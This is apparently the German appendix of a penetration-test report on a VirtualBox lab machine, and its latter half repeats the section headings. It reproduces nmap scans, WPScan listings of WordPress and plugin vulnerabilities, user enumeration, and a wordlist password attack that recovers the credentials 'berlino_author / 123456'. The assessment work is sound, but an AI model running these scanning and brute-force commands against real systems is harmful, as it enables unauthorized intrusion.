6.Anhang
6.1 nmap
Service- und Versionsdetection
root@kali:~# nmap 192.168.178.134 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 19:04 EST
Nmap scan report for yilmaz-VirtualBox.fritz.box (192.168.178.134)
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3)
443/tcp open ssl/http Apache httpd 2.4.41 ((Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3)
3306/tcp open mysql?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=11/14%Time=5DCDEB9A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPReque
SF:st,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
MAC Address: 08:00:27:42:4E:2B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
Betriebssystemdetection
root@kali:~# nmap 192.168.178.134 -O
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 19:06 EST
Nmap scan report for yilmaz-VirtualBox.fritz.box (192.168.178.134)
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql
MAC Address: 08:00:27:42:4E:2B (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds
6.2 WPScan: Allgemeine Ergebnisse
root@kali:~# wpscan --url 192.168.56.101/wordpress --enumerate p --wp-plugins-dir wp-content/plugins --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Sun Nov 24 06:15:18 2019
Apache-Server 2.4.41
[+] http://192.168.56.101/wordpress/
| Interesting Entries:
| - Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3
| - X-Powered-By: PHP/7.3.11
| Found By: Headers (Passive Detection)
| Confidence: 100%
Wordpress XMLPRC
[+] http://192.168.56.101/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
References:
Wordpress README
[+] http://192.168.56.101/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
Wordpress CRON
[+] http://192.168.56.101/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
References:
Wordpress Version 4.3.18
[+] WordPress version 4.3.18 identified (Insecure, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.56.101/wordpress/, Match: '-release.min.js?ver=4.3.18'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.101/wordpress/, Match: 'WordPress 4.3.18'
6.3 WPScan: Identifizierte Vulnerabilities für CMS Wordpress Version 4.3.18
Authenticated Code Execution (CVE-2019-8942, CVE-2019-8943)
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
Description:
An attacker who gains access to an account with at least author privileges on a target WordPress site can execute arbitrary PHP code on the underlying server, leading to a full remote takeover.
References:
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.3.19#
Description:
An attacker can take over any WordPress site that has comments enabled by tricking an administrator of a target blog to visit a website set up by the attacker. As soon as the victim administrator visits the malicious website, a cross-site request forgery (CSRF) exploit is run against the target WordPress blog in the background, without the victim noticing. The CSRF exploit abuses multiple logic flaws and sanitization errors that when combined lead to Remote Code Execution and a full site takeover.
References:
Cross-Site Scripting (XSS) in URL Sanitisation ( CVE-2019-16222)
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 4.3.20
Description:
WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks.
References:
Stored XSS in Customizer (CVE-2019-17674)
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 4.3.21
Description
WordPress before 5.2.4 is vulnerable to stored XSS (cross-site scripting) via the Customizer.
References:
Unauthenticated View Private/Draft Posts (CVE-2019-17671)
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 4.3.21
Description:
This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.
References:
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 is vulnerable to a stored XSS attack to inject JavaScript into STYLE elements.
References:
JSON Request Cache Poisoning (CVE-2019-17673)
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 is vulnerable to poisoning of the cache of JSON GET requests because certain requests lack a Vary: Origin header.
References:
Server-Side Request Forgery (SSRF) in URL Validation (CVE-2019-17669, CVE-2019-17670)
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because URL validation does not consider the interpretation of a name as a series of hex characters.
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because Windows paths are mishandled during certain validation of relative URLs.
References:
Admin Referrer Validation (CVE-2019-17675)
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.
References:
[i] The main theme could not be detected.
6.4 WPScan: Identifzierte Vulnerabilities für die Wordpress Plugins
Akismet: Unauthenticated Stored Cross-Site Scripting (XSS) (CVE-2015-9357)
[+] akismet
| Location: http://192.168.56.101/wordpress/wp-content/plugins/akismet/
| Latest Version: 4.1.3
| Last Updated: 2019-11-13T20:46:00.000Z
|
| Detected By: Known Locations (Aggressive Detection)
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
Description:
The akismet plugin before 3.1.5 for WordPress has XSS.
References:
| The version could not be determined.
WP-database-backup Version 2.1.1
| Location: http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/
| Last Updated: 2019-10-06T06:09:00.000Z
| Readme: http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/readme.txt
| [!] The version is out of date, the latest version is 5.4.1
|
| Detected By: Known Locations (Aggressive Detection)
| Version: 2.1.1 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/readme.txt
| [!] 6 vulnerabilities identified:
WP-database-backup: Authenticated Stored Cross-Site Scripting (XSS)
| [!] Title: WP Database Backup <= 3.3 - Authenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.4
Description:
Persistent Cross-Site Scripting (XSS): Authenticated administrators can store arbitrary html/js code (there is no CSRF protection).
References:
WP-database-backup: Cross-Site Request Forgery (CSRF)
| [!] Title: WP Database Backup <= 4.3.5 - Cross-Site Request Forgery (CSRF)
| Fixed in: 4.3.6
Description:
The detected version is vulnerable to Cross-Site Request Forgery (CSRF).
References:
WP-database-backup: Unauthenticated OS Command Injection
| [!] Title: WP Database Backup <= 5.1.2 - Unauthenticated OS Command Injection
| Fixed in: 5.2
Description:
In unpatched versions of WP Database Backup, an attacker is able to inject operating system (OS) commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.
References:
WP-database-backup: XSS (CVE-2019-14949)
| [!] Title: WP Database Backup < 5.1.2 - XSS
| Fixed in: 5.1.2
Description:
The wp-database-backup plugin before 5.1.2 for WordPress has XSS.
References:
WP Database Backup < 4.3.3 CSRF & XSS
| [!] Title: WP Database Backup < 4.3.3 - CSRF & XSS
| Fixed in: 4.3.3
References:
WP Database Backup < 4.3.1 - CSRF & XSS (CVE-2016-10875)
| [!] Title: WP Database Backup < 4.3.1 - CSRF & XSS
| Fixed in: 4.3.1
Description:
The detected version is vulnerable to CSRF & XSS.
References:
6.5 WPScan: User Enumeration
root@kali:~# wpscan --url 192.168.56.101/wordpress --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Sun Nov 24 06:15:54 2019
[…]
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <==> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
berlino_admin
[+] berlino_admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
berlino_author
[+] berlino_author
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
6.6 Wordpress Password Hack
root@kali:/usr/share/wordlists# wpscan --url 192.168.56.101/wordpress --passwords '/usr/share/wordlists/fasttrack.txt' --usernames berlino_author
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Fri Dec 13 06:08:20 2019
[…]
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 <==============================================================> (0 / 0) 100.0% Time: 00:00:00
WARNING: Your progress bar is currently at 0 out of 0 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Progress Time: 00:00:00 <==============================================================> (0 / 0) 100.0% Time: 00:00:00
[SUCCESS] - berlino_author / 123456
All Found
[i] Valid Combinations Found:
| Username: berlino_author, Password: 123456
6.7 nessus: Basic Network Scan
Die ausführlichen Ergebnisse des Basic Network Scan finden sich hier: nessus: Basic Network Scan
6.8 nessus: Web Application Test
Die ausführlichen Ergebnisse des Web Application Test finden sich hier: nessus: Web Application Test
6.Anhang
6.1 nmap
Service- und Versionsdetection
Betriebssystemdetection
6.2 WPScan: Allgemeine Ergebnisse
Apache-Server 2.4.41
Wordpress XMLPRC
References:
Wordpress README
Wordpress CRON
References:
Wordpress Version 4.3.18
6.3 WPScan: Identifizierte Vulnerabilities für CMS Wordpress Version 4.3.18
Authenticated Code Execution (CVE-2019-8942, CVE-2019-8943)
Description:
An attacker who gains access to an account with at least author privileges on a target WordPress site can execute arbitrary PHP code on the underlying server, leading to a full remote takeover.
References:
Comment Cross-Site Scripting (XSS) (CVE-2019-9787)
Description:
An attacker can take over any WordPress site that has comments enabled by tricking an administrator of a target blog to visit a website set up by the attacker. As soon as the victim administrator visits the malicious website, a cross-site request forgery (CSRF) exploit is run against the target WordPress blog in the background, without the victim noticing. The CSRF exploit abuses multiple logic flaws and sanitization errors that when combined lead to Remote Code Execution and a full site takeover.
References:
Cross-Site Scripting (XSS) in URL Sanitisation ( CVE-2019-16222)
Description:
WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks.
References:
Stored XSS in Customizer (CVE-2019-17674)
Description
WordPress before 5.2.4 is vulnerable to stored XSS (cross-site scripting) via the Customizer.
References:
Unauthenticated View Private/Draft Posts (CVE-2019-17671)
Description:
This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.
References:
Stored XSS in Style Tags (CVE-2019-17672)
Description:
WordPress before 5.2.4 is vulnerable to a stored XSS attack to inject JavaScript into STYLE elements.
References:
JSON Request Cache Poisoning (CVE-2019-17673)
Description:
WordPress before 5.2.4 is vulnerable to poisoning of the cache of JSON GET requests because certain requests lack a Vary: Origin header.
References:
Server-Side Request Forgery (SSRF) in URL Validation (CVE-2019-17669, CVE-2019-17670)
Description:
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because URL validation does not consider the interpretation of a name as a series of hex characters.
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because Windows paths are mishandled during certain validation of relative URLs.
References:
Admin Referrer Validation (CVE-2019-17675)
Description:
WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.
References:
6.4 WPScan: Identifzierte Vulnerabilities für die Wordpress Plugins
Akismet: Unauthenticated Stored Cross-Site Scripting (XSS) (CVE-2015-9357)
Description:
The akismet plugin before 3.1.5 for WordPress has XSS.
References:
WP-database-backup Version 2.1.1
WP-database-backup: Authenticated Stored Cross-Site Scripting (XSS)
Description:
Persistent Cross-Site Scripting (XSS): Authenticated administrators can store arbitrary html/js code (there is no CSRF protection).
References:
WP-database-backup: Cross-Site Request Forgery (CSRF)
Description:
The detected version is vulnerable to Cross-Site Request Forgery (CSRF).
References:
WP-database-backup: Unauthenticated OS Command Injection
Description:
In unpatched versions of WP Database Backup, an attacker is able to inject operating system (OS) commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.
References:
WP-database-backup: XSS (CVE-2019-14949)
Description:
The wp-database-backup plugin before 5.1.2 for WordPress has XSS.
References:
WP Database Backup < 4.3.3 CSRF & XSS
References:
WP Database Backup < 4.3.1 - CSRF & XSS (CVE-2016-10875)
Description:
The detected version is vulnerable to CSRF & XSS.
References:
6.5 WPScan: User Enumeration
[…]
berlino_admin
berlino_author
6.6 Wordpress Password Hack
[…]
6.7 nessus: Basic Network Scan
Die ausführlichen Ergebnisse des Basic Network Scan finden sich hier: nessus: Basic Network Scan
6.8 nessus: Web Application Test
Die ausführlichen Ergebnisse des Web Application Test finden sich hier: nessus: Web Application Test